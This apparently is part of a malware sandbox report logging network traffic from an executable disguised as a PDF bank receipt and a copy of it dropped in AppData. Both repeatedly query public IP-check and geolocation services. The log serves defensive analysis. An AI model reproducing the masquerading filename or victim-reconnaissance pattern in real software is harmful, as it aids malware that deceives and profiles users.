                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                        Jan 16, 2025 07:02:03.934973001 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Jan 16, 2025 07:02:04.147552013 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:04 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.449737132.226.247.73807656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:04.983462095 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Jan 16, 2025 07:02:05.658143044 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:05 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.449740132.226.247.73808008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:06.023052931 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:06.698771000 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:06 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                        Jan 16, 2025 07:02:06.718485117 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Jan 16, 2025 07:02:06.927599907 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:06 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                        Jan 16, 2025 07:02:08.039510012 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Jan 16, 2025 07:02:08.248792887 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:08 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.449741132.226.247.73807656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:06.293421030 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:06.976210117 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:06 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.449744132.226.247.73807656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:07.618292093 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:08.295749903 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:08 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.449747132.226.247.73808008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:08.862938881 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Jan 16, 2025 07:02:09.538466930 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:09 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.449748132.226.247.73807656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:08.909589052 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:09.584110022 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:09 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        7192.168.2.449752132.226.247.73807656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:10.204824924 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:10.888091087 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:10 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.449751132.226.247.73808008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:10.326970100 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:10.897293091 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:10 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.449755132.226.247.73808008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:11.500195980 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:12.179640055 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:12 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.449756132.226.247.73807656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:11.516803980 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:12.191920042 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:12 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.449759132.226.247.73808008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:12.798032999 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:13.487201929 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:13 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.449760132.226.247.73807656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:12.809525013 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:13.481650114 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:13 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        13192.168.2.449763132.226.247.73808008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:14.102813959 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:14.795737982 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:14 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        14192.168.2.449767132.226.247.73808008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:15.421257973 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:16.113840103 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:16 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        15192.168.2.449771132.226.247.73808008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:16.762437105 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:17.453342915 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:17 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.449734104.21.64.14437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:03 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:03 UTC863INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:03 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322112
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTz5IGxPGT4AZ0jIwe36gl8RK3G%2F3UHBeFmQoYu04V0ngSjK67HPcK7IRp%2Bpoff6vPIJ32W1Qd42EvwS%2FqB7kzEtpwX3o%2BEk2fbrU6NLF%2B%2BiE4vCLRdT3o30QY5YTzTAS6yD%2FOa7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be4fdfbf6c358-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
